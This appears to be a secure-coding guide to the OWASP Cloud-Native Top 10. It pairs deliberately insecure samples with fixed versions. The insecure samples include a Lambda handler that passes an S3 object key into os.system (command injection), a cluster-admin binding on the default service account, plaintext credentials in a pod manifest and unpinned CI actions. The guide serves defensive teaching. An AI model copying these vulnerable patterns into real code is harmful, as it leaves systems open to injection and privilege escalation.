The 10 most critical security risks for cloud-native applications and how to mitigate them.
The OWASP Cloud-Native Application Security Top 10 identifies the most prominent security risks for cloud-native applications running on platforms such as Kubernetes, Docker, and serverless architectures. It covers misconfigurations, supply chain risks, secrets management, and more across the entire cloud-native stack.
Misconfigured cloud services, containers, and orchestrators are the leading cause of cloud-native breaches. This includes running containers as root, using default configurations, exposing the Kubernetes API server publicly, and failing to enable audit logging on cloud resources.
Attackers can exploit misconfigurations to gain full cluster control, escape containers, access cloud metadata services, or pivot across the infrastructure. A single misconfigured S3 bucket or open Kubernetes dashboard has led to massive data breaches.
# Running container as root with no resource limits FROM ubuntu:latest RUN apt-get update && apt-get install -y curl wget COPY app /app # No USER directive — runs as root! CMD ["/app/server"]
FROM gcr.io/distroless/static:nonroot COPY --chown=65534:65534 app /app USER 65534:65534 EXPOSE 8080 ENTRYPOINT ["/app/server"]
Cloud-native applications receive input not only from traditional HTTP requests but also from cloud events (SQS, Pub/Sub, EventBridge), serverless triggers, and inter-service communication. Injection flaws in any of these vectors can lead to command execution, data exfiltration, or privilege escalation.
Serverless functions triggered by cloud events may process untrusted data without validation, leading to OS command injection, NoSQL injection, or event-driven SSRF. Attackers can poison message queues or event buses to compromise downstream services.
# Lambda function processing S3 event without sanitizing filename import os def handler(event, context): bucket = event['Records'][0]['s3']['bucket']['name'] key = event['Records'][0]['s3']['object']['key'] # Command injection via crafted filename! os.system(f"aws s3 cp s3://{bucket}/{key} /tmp/{key}")
import boto3, re from urllib.parse import unquote_plus def handler(event, context): s3 = boto3.client('s3') bucket = event['Records'][0]['s3']['bucket']['name'] key = unquote_plus(event['Records'][0]['s3']['object']['key']) # Validate key against allowlist pattern if not re.match(r'^[\w\-./]+$', key): raise ValueError(f"Invalid S3 key: {key}") # Use SDK instead of shell commands s3.download_file(bucket, key, f'/tmp/{key.split("/")[-1]}')
Cloud-native environments involve multiple layers of identity: cloud IAM, Kubernetes RBAC, service mesh mTLS, and application-level auth. Misconfigured or overly permissive policies at any layer can allow lateral movement, privilege escalation, or unauthorized access to sensitive resources.
Over-permissive IAM roles assigned to pods can grant workloads access to the entire cloud account. Missing service-to-service authentication allows any compromised pod to impersonate other services.
# Overly permissive ClusterRoleBinding apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: default-admin subjects: - kind: ServiceAccount name: default # Default SA — shared by all pods! namespace: default roleRef: kind: ClusterRole name: cluster-admin # Full cluster access! apiGroup: rbac.authorization.k8s.io
# Dedicated ServiceAccount with minimal Role apiVersion: v1 kind: ServiceAccount metadata: name: order-service namespace: production annotations: eks.amazonaws.com/role-arn: arn:aws:iam::123456:role/order-svc --- apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: name: order-service-role namespace: production rules: - apiGroups: [""] resources: ["configmaps"] verbs: ["get"]
CI/CD pipelines are high-value targets because they have write access to production environments. Compromising a build pipeline enables supply chain attacks, malicious code injection, and deployment of backdoored images. Insecure pipeline configurations, poisoned base images, and unsigned artifacts all contribute to this risk.
A compromised CI/CD pipeline can deploy malicious code to all environments, steal secrets stored in pipeline variables, or tamper with container images. SolarWinds-style attacks demonstrate the catastrophic impact of supply chain compromise.
# Insecure CI pipeline — unpinned actions, no image signing name: Deploy on: push jobs: deploy: runs-on: ubuntu-latest steps: - uses: actions/checkout@main # Unpinned — could be compromised! - run: | docker build -t myapp:latest . docker push myregistry/myapp:latest # No signing! kubectl apply -f deploy.yaml # No admission control!
name: Secure Deploy on: push permissions: id-token: write jobs: deploy: runs-on: ubuntu-latest steps: - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # Pinned SHA - run: | docker build -t myregistry/myapp:${{ github.sha }} . cosign sign myregistry/myapp:${{ github.sha }} # Sign image - run: trivy image myregistry/myapp:${{ github.sha }} --exit-code 1 - run: kubectl apply -f deploy.yaml # Admission controller verifies signatures
Secrets such as API keys, database credentials, and TLS certificates are often hardcoded in source code, stored in plaintext ConfigMaps, or embedded in container images. Kubernetes Secrets are only base64-encoded by default, not encrypted, providing minimal protection.
Exposed secrets can give attackers direct access to databases, cloud accounts, and third-party services. Secrets in git history, container layers, or environment variables are easily discovered and exploited.
# Secrets in plaintext environment variables apiVersion: v1 kind: Pod metadata: name: my-app spec: containers: - name: app env: - name: DB_PASSWORD value: "SuperSecret123!" # Plaintext in manifest! - name: AWS_SECRET_KEY value: "AKIA..." # Cloud credentials in YAML!
# Use External Secrets Operator with a vault backend apiVersion: external-secrets.io/v1beta1 kind: ExternalSecret metadata: name: my-app-secrets spec: refreshInterval: 1h secretStoreRef: name: vault-backend kind: ClusterSecretStore target: name: my-app-secrets data: - secretKey: db-password remoteRef: key: secret/data/myapp property: db-password
By default, Kubernetes allows all pods to communicate with each other without restriction. Missing or overly permissive NetworkPolicies, security groups, and firewall rules enable lateral movement within the cluster and between cloud services.
Without network segmentation, a compromised pod can reach any other service in the cluster, access databases directly, or exfiltrate data to external endpoints. Flat networks amplify the blast radius of any breach.
# No NetworkPolicy — all pods can talk to everything apiVersion: v1 kind: Namespace metadata: name: production # No NetworkPolicy resources defined # All ingress and egress traffic is allowed by default
# Default-deny all traffic, then allow only what's needed apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: default-deny-all namespace: production spec: podSelector: {} policyTypes: ["Ingress", "Egress"] --- apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-frontend-to-api namespace: production spec: podSelector: matchLabels: app: api-server ingress: - from: - podSelector: matchLabels: app: frontend ports: - port: 8080
Cloud-native applications rely heavily on open-source base images, libraries, and Kubernetes operators. Running outdated or unpatched components with known CVEs exposes the application to well-documented exploits. Container images often include hundreds of packages, each a potential vulnerability.
Known vulnerabilities in base images (e.g., Log4Shell, OpenSSL bugs) can be exploited using publicly available tools. Attackers actively scan for containers running vulnerable versions. A single unpatched library can compromise the entire workload.
# Using outdated base image with known CVEs FROM node:14 # EOL version with known vulns COPY package.json . RUN npm install # No audit, no lockfile verification COPY . . CMD ["node", "server.js"]
# Use current, slim base image with vulnerability scanning FROM node:22-slim AS build WORKDIR /app COPY package.json package-lock.json ./ RUN npm ci --only=production # Reproducible install from lockfile RUN npm audit --audit-level=high # Fail on high+ vulns FROM gcr.io/distroless/nodejs22-debian12 COPY --from=build /app /app CMD ["/app/server.js"]
Cloud-native environments make it easy to spin up resources but hard to track them. Orphaned containers, forgotten namespaces, stale cloud resources, and shadow IT deployments create an unmanaged attack surface. Without proper asset inventory, security teams cannot protect what they don't know exists.
Forgotten or unmanaged resources often run outdated software, lack security monitoring, and have stale credentials. Attackers target these neglected assets as entry points because they are less likely to be monitored or patched.
# Resources created without tagging or lifecycle management resource "aws_instance" "test_server" { ami = "ami-0abcdef1234567890" instance_type = "t3.medium" # No tags — who owns this? What's it for? # No lifecycle policy — runs forever } resource "aws_s3_bucket" "temp_data" { bucket = "temp-data-2024" # No expiration, no access logging }
resource "aws_instance" "test_server" { ami = "ami-0abcdef1234567890" instance_type = "t3.medium" tags = { Name = "test-server" Owner = "platform-team" Environment = "staging" ManagedBy = "terraform" ExpiresAt = "2026-04-30" } } resource "aws_s3_bucket" "temp_data" { bucket = "temp-data-2024" tags = { Owner = "data-team" ManagedBy = "terraform" } lifecycle_rule { enabled = true expiration { days = 90 } } }
Without proper resource quotas and limits, a single misbehaving or compromised workload can consume all available CPU, memory, or storage, causing denial of service for other applications. Cryptojacking attacks are particularly common in environments without resource limits.
Attackers can deploy cryptomining containers or resource-intensive workloads that consume all cluster resources. Without limits, a fork bomb or memory leak in one pod can crash the entire node, affecting all co-located workloads.
# Pod with no resource limits apiVersion: v1 kind: Pod metadata: name: my-app spec: containers: - name: app image: myapp:latest # No resources block — can consume unlimited CPU/memory!
apiVersion: v1 kind: Pod metadata: name: my-app spec: containers: - name: app image: myapp:1.2.3 resources: requests: cpu: "100m" memory: "128Mi" limits: cpu: "500m" memory: "512Mi" --- # Namespace-level quota apiVersion: v1 kind: ResourceQuota metadata: name: compute-quota namespace: production spec: hard: requests.cpu: "10" requests.memory: "20Gi" limits.cpu: "20" limits.memory: "40Gi"
Cloud-native environments generate logs across multiple layers: application, container runtime, orchestrator, service mesh, and cloud platform. Without centralized logging, correlation across these layers, and runtime threat detection, security incidents go undetected or are discovered too late.
Ephemeral containers lose their logs when terminated, destroying forensic evidence. Without Kubernetes audit logs and runtime monitoring, attackers can create backdoors, escalate privileges, or exfiltrate data without triggering any alerts.
# No audit policy, no log forwarding apiVersion: v1 kind: Pod metadata: name: my-app spec: containers: - name: app image: myapp:latest # Logs go to stdout only — lost when pod restarts # No audit logging configured on the cluster # No runtime security monitoring
# Kubernetes audit policy for security events apiVersion: audit.k8s.io/v1 kind: Policy rules: - level: RequestResponse resources: - group: "" resources: ["secrets", "configmaps"] - level: Metadata resources: - group: "rbac.authorization.k8s.io" resources: ["clusterroles", "clusterrolebindings"] - level: Metadata verbs: ["create", "delete", "patch"] # Deploy Falco for runtime threat detection # Forward logs to SIEM via Fluent Bit / Fluentd
| ID | Vulnerability | Severity | Key Mitigation |
|---|---|---|---|
| CNAS-1 | Insecure Cloud/Container/Orchestration Config | Critical | Distroless images, Pod Security Standards, IaC scanning |
| CNAS-2 | Injection Flaws (Cloud Events) | Critical | Input validation, SDK over shell, egress filtering |
| CNAS-3 | Improper Authentication & Authorization | Critical | Least-privilege RBAC, IRSA, mTLS |
| CNAS-4 | CI/CD Pipeline & Supply Chain Flaws | High | Pinned SHAs, image signing, SLSA provenance |
| CNAS-5 | Insecure Secrets Storage | Critical | Vault/Secrets Manager, KMS encryption, secret scanning |
| CNAS-6 | Over-Permissive Network Policies | High | Default-deny, egress restrictions, Calico/Cilium |
| CNAS-7 | Components with Known Vulnerabilities | High | Image scanning, minimal base images, SBOM |
| CNAS-8 | Improper Asset Management | Medium | Resource tagging, automated cleanup, IaC |
| CNAS-9 | Inadequate Compute Resource Quotas | Medium | Resource limits, ResourceQuotas, usage monitoring |
| CNAS-10 | Ineffective Logging & Monitoring | High | Audit logs, Falco/Sysdig, centralized SIEM |